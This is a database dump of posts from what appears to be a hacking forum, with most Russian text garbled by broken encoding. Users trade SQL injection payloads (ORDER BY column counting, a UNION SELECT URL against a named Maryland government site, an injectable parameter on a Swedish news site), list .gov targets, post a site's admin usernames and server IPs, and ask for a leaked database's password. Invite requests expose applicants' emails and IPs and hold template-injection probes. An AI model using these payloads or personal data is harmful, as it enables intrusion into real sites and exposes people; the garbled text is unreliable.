(1871, 1612, 1833, 'unlog', 45, '', 1409574884, '>>úøýь ðôüøýð þт Ñ€ÑÂôüðùýð. \nýõ ÿþýÑÂû, úðúþóþ ðôüøýð? õÑÂûø ðôüøý-ю÷õрþò, тþ òþт ø÷ ñð÷ы:\n[CODE]\'cyberbattler\',\n\'ekzo\',\n\'draftpin\', \n\'Burunduk\'[/CODE]\n\nIP <=> domain\n[CODE]5.178.87.238 dev.overpro.ru\n5.178.87.238 radio.overpro.ru\n5.178.87.238 eac.0ver.pro\n5.178.87.238 ac.0ver.pro\n5.178.87.238 hltv.0ver.pro\n\n88.208.61.116 overpro.ru\n88.208.61.116 0ver.pro\n88.208.61.116 test.overpro.ru\n88.208.61.116 task.0ver.pro\n88.208.61.116 zeta.overpro.ru\n\n88.208.57.184 db.0ver.pro\n\n31.131.251.105 public.overpro.ru[/CODE]', 1, 0, '', 0, 1, 0, 0, 0),
(1872, 1624, 1867, 'BigBear', 34, '', 1409577915, 'у üõýѠõÑÂть чõû, ýþ ýуöõý чётúøù ÑÂÿøÑÂþú ôþüõýþò.', 1, 0, '', 0, 1, 0, 0, 0),
(1873, 1624, 1867, 'opensc', 40, '', 1409582182, 'úðúøõ ÑÂтрðýы?', 1, 0, '', 0, 1, 0, 0, 0),
(1874, 1625, 0, 'Invite', 2, '{$name}', 1409585723, '[SIZE=\'4\'][COLOR=\'Sienna\']Burak Beyzadeoglu[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: Not\n[b]e-mail[/b]: hacker@outlook.cz\n[b]Info[/b]: Detail: For whitehat\r\n\r\nhttp://company.nokia.com/en/acknowledgements\r\n\r\nhttps://company.zynga.com/security/whitehats\r\n\r\nhttp://www.constantcontact.com/legal/report-vulnerability\r\n\r\nhttp://ebay.com/securitycenter/ResearchersAcknowledgement.html\r\n\r\nhttp://helpx.adobe.com/security/acknowledgements.html\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 88.246.254.180\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/BurakBeyzdeoglu | https://twitter.com/BurakBeyzdeoglu \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1875, 1624, 1867, 'Psych0tr1a', 11, '', 1409585812, 'üøшúð þтòõть ò ðÑÂõúу\nø ÿрþòõрь ûøчúу у ÑÂõñÑÂ!!', 1, 0, '', 0, 1, 0, 0, 0),
(1876, 1624, 1873, 'Psych0tr1a', 11, '', 1409585892, '[QUOTE=opensc;1873]úðúøõ ÑÂтрðýы?[/QUOTE]\r\n\r\nusa úþýõчýþöõ\r\n\r\n.gov ðýõ gov.*', 1, 0, '', 0, 1, 0, 0, 0),
(1877, 1626, 0, 'Psych0tr1a', 11, '[MySQL]áÿþÑÂþñ þÿрõôõûõýøѠúþûûøчõÑÂтòð òыòþôøüых ÑÂтþñцþò ò 1 ÷ðÿрþÑÂ.', 1409586490, 'ÕÑÂûø òы òôруó ýðтúýуûøÑÂÑŒ ýð sqli ò úþтрþù òúûючõý òыòþô þшøñþú тþ òþт тðúøü òþт ýõ÷ðüыÑÂûþòðтыü ÑÂÿþÑÂþñþü üþöýþ þÿрõôõûøть úþûûøчõÑÂтòþ ÑÂтþûñцþò ÷ð 1 ÷ðÿрþÑÂ.\n\nßрþòõрøü òыòþôøтÑÂѠûø þшøñúð!\nþтÿрðòÃȄÂõü\n[code]*+order+by+100+--+[/code]\n\n\n\nÕÑÂûø òÑÂõ хþрþшþ ÑÂтþт ÷ðÿрþѠòыôðÑÂÑ‚ ýðü þшøñúу \n[code]Query failed: Unknown column \'100\' in \'order clause\'[/code]\n\n\n\nßþÑÂûõ чõóþ ÑÂüõûþ òÑÂтðòÃȄÂõü тðúþù ÿÑÂùûþðô.\n[code]+order+by+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70+--+[/code]\n\n\n\nÃ’ þтòõт ÿþûучøü\n[code]Query failed: Unknown column \'*\' in \'order clause\'[/code]\n\n\n\nÓôõ \'*\'-1=\'úþûûøчõÑÂтòþ ýðшøх ÑÂтþûñцþò\'.', 1, 0, '', 0, 1, 0, 0, 0),
(1878, 1083, 1834, 'Psych0tr1a', 11, '', 1409586755, '[QUOTE=kx00;1834]ÑÂúуûю ýðшõû. ñð÷у ÑÂûøòðù. ты ÿþ úðúþüу ôþüõýу ýðшõû ôырúу?[/QUOTE]\n\nÃÂð ôþüõýõ\n[url]www.toranoana.jp[/url]', 1, 0, '', 0, 1, 0, 0, 0),
(1879, 1622, 1857, 'kx00', 6, '', 1409587072, 'ýõт тþûьúþ ру, õщõ ýуöõý ðýôрþùô трðфф, úтþ рþñøт Ñ Play Üðрúõт òõûúþü;)', 1, 1, '', 0, 1, 0, 0, 0),
(1880, 1083, 1878, 'kx00', 6, '', 1409587923, '[quote=psych0tr1a;1878]ýð ôþüõýõ\r\n[url]www.toranoana.jp[/url][/quote]\r\núрðÑÂðòð. ýõôõûю øÑÂúðû ÑÂúуûю øûø чтþ ýøñуôь ò ÑÂтþü рþôõ. ÑÂðùт ðóрþфøóõýýыù!!! туÿþ тõрÿõýøѠýõ хòðтøûþ) ÿþшõû ýðñухðÃȄÂÑÂ.', 1, 1, '', 0, 1, 0, 0, 0),
(1883, 1083, 1119, 'Psych0tr1a', 11, '', 1409590597, 'ухðхðх))', 1, 0, '', 0, 1, 0, 0, 0),
(1884, 1616, 1848, 'w0rm', 1, '', 1409597851, 'Ok. Ãâ€Ã¾Ã±Ã°Ã²Ã¸Ã» ò ÿûðý ýð ôõýь.', 1, 0, '', 0, 1, 0, 0, 0),
(1885, 1628, 0, 'Invite', 2, '{$name}', 1409604220, '[SIZE=\'4\'][COLOR=\'Sienna\']greedy[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: alice.johnson.67.ny@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 213.112.243.97\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1; rv:28.0) Gecko/20100101 Firefox/28.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1886, 1629, 0, 'Invite', 2, '{$name}', 1409606276, '[SIZE=\'4\'][COLOR=\'Sienna\']kajika[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: kajika@jabber.ccc.de\n[b]e-mail[/b]: kajika@safe-mail.net\n[b]Info[/b]: I am experienced in coding binary and web. Had a break from scene for 3 years and want to get active again.\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 31.204.150.121\n[*][b]real ip[/b]: 31.204.150.121\n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1887, 1626, 1877, 'BigBear', 34, '', 1409625644, 'ÑÂтþ тðúþù ÑÂтёÃ± øûø Ѡýõ ÿþýÑÂû юüþрð?', 1, 0, '', 0, 1, 0, 0, 0),
(1889, 1630, 0, 'Invite', 2, '{$name}', 1409631815, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: qweqwe@qq.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 223.73.49.155\n[*][b]real ip[/b]: 223.73.49.155\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vk.com/nicknameband | http://vk.com/nicknameband \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1890, 1626, 1877, 'Psych0tr1a', 11, '', 1409666498, 'ð ÿþчõüу ÑÂтõñ тþ?\nýøóôõ ýõ þÿøÑÂðýþ ÑÂтþóþ òþт ø рõшøû ÷ðÿþÑÂтøть\nôÃȄʄÂúÑÂÿûþøтþò ÿрøóþôøтÑÂÑÂ.', 1, 0, '', 0, 1, 0, 0, 0),
(1892, 1631, 0, 'Invite', 2, '{$name}', 1409680304, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: ${99460+100307}\n[b]Info[/b]: *************************************************************************\nThe decision will be made automatically, after u send request upload this page again.\n*************************************************************************\n\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 85.16.36.103\n[*][b]real ip[/b]: 85.16.36.103\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1893, 1632, 0, 'Invite', 2, '{$name}', 1409680306, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: response.write(9713317*9988027)\n[b]Info[/b]: *************************************************************************\nThe decision will be made automatically, after u send request upload this page again.\n*************************************************************************\n\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 85.16.36.103\n[*][b]real ip[/b]: 85.16.36.103\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1894, 1633, 0, 'Invite', 2, '{$name}', 1409680311, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: response.write(9713317*9988027)\n[b]Info[/b]: *************************************************************************\nThe decision will be made automatically, after u send request upload this page again.\n*************************************************************************\n\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 85.16.36.103\n[*][b]real ip[/b]: 85.16.36.103\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1895, 1634, 0, 'Invite', 2, '{$name}', 1409684278, '[SIZE=\'4\'][COLOR=\'Sienna\']yusk3[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ysk@inbox.im\n[b]e-mail[/b]: ysk3@live.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 187.144.73.251\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.102 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1896, 1635, 0, 'Invite', 2, '{$name}', 1409693476, '[SIZE=\'4\'][COLOR=\'Sienna\']Nicknamewerwer[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabberasdsad\n[b]e-mail[/b]: Emailsadasd@weqeqw.gdfgf\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 197.231.221.211\n[*][b]real ip[/b]: 178.175.139.139\n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1897, 1636, 0, 'Invite', 2, '{$name}', 1409711516, '[SIZE=\'4\'][COLOR=\'Sienna\']pavqk[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: pavqk@suchat.org\n[b]e-mail[/b]: marksp85@hotmail.com\n[b]Info[/b]: Hello w0rm\r\nI am a person who does not like to appear too on the web. \r\nHowever I like a lot of security and know enough. \r\nHave knowledge XSS, SQLi, LFI and some other techniques. I know PHP and Mysql too. Since I was 14 I was always interested in the subject and acquire knowledge by that.\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 186.214.64.224\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://pavqk.banjiazheng.rjokztw.com | pavqk.banjiazheng.rjokztw.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1901, 1638, 0, 'null', 9, 'sql inj kontakten.dn.se', 1409747318, '[url]http://kontakten.dn.se/index.php?pg=ProfileSearch&AdNum=201484[/url]\r\n\r\nßðрðüõтр AdNum', 1, 0, '', 0, 1, 0, 0, 0),
(1902, 1638, 1901, '123', 41, '', 1409748676, '4 òõтúð ÿхÿ ø 4 òõтúð üуÑÂúуû, öõÑÂть )', 1, 0, '', 0, 1, 0, 0, 0),
(1903, 1638, 1902, 'null', 9, '', 1409760496, '[QUOTE=123;1902]4 òõтúð ÿхÿ ø 4 òõтúð üуÑÂúуû, öõÑÂть )[/QUOTE]\r\náðüþóþ ÿþрðôþòðûþ', 1, 0, '', 0, 1, 0, 0, 0),
(1904, 1015, 1017, 'viking', 0, '', 1409770946, 'verified.sql.zip is password protected!, what is password?', 1, 0, '', 0, 1, 0, 0, 0),
(1905, 1639, 0, 'Psych0tr1a', 11, 'SQLi www.goccp.maryland.gov', 1409781988, '[code]http://www.goccp.maryland.gov/training/provider-details.php?id=111\'+union/**/%73elect/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+[/code]\n\näøûьтр ÑÂрðñðтыòðõт ýð ÑÂûþòþ select\nÚðú ýøñуôь üþöýþ þñþùтø?\n\nçтþñы úрутøть ýуöýþ þтúûючøть рõôøрõúт.', 1, 0, '', 0, 1, 0, 0, 0),
(1906, 1640, 0, 'Invite', 2, '{$name}', 1409785756, '[SIZE=\'4\'][COLOR=\'Sienna\']Tanreon[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: kabachok@dukgo.com\n[b]e-mail[/b]: thoriumas@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 188.233.206.21\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/candidjessica/status/213136909629792257 | https://twitter.com/candidjessica/status/213136909629792257 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1907, 1641, 0, 'Invite', 2, '{$name}', 1409790949, '[SIZE=\'4\'][COLOR=\'Sienna\']ZuCaris[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: None\n[b]e-mail[/b]: qaglleyv222@grr.la\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 192.227.237.124\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://ink361.com/app/users/ig-253957893/.../following | http://ink361.com/app/users/ig-253957893/.../following \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1908, 1642, 0, 'Invite', 2, '{$name}', 1409816056, '[SIZE=\'4\'][COLOR=\'Sienna\']bhmanh[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: no hv\n[b]e-mail[/b]: buichucan@me.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 42.115.177.105\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.citeulike.org/user/UFGeog/author/Manh:BH | http://www.citeulike.org/user/UFGeog/author/Manh:BH \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1909, 1643, 0, 'Invite', 2, '{$name}', 1409833231, '[SIZE=\'4\'][COLOR=\'Sienna\']linkcabin[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: pbhd@jabber.ru\n[b]e-mail[/b]: linkcabin@gmail.com\n[b]Info[/b]: HF: http://www.hackforums.net/member.php?action=profile&uid=680866\r\n\r\nReputable member of HF.\r\n\r\nhttps://www.youtube.com/user/linksec/about\r\n\r\nDo research on various security subjects and had a 2.8k channel before YouTube brought it down (search \'linkcabin\')\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 2.96.124.230\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] 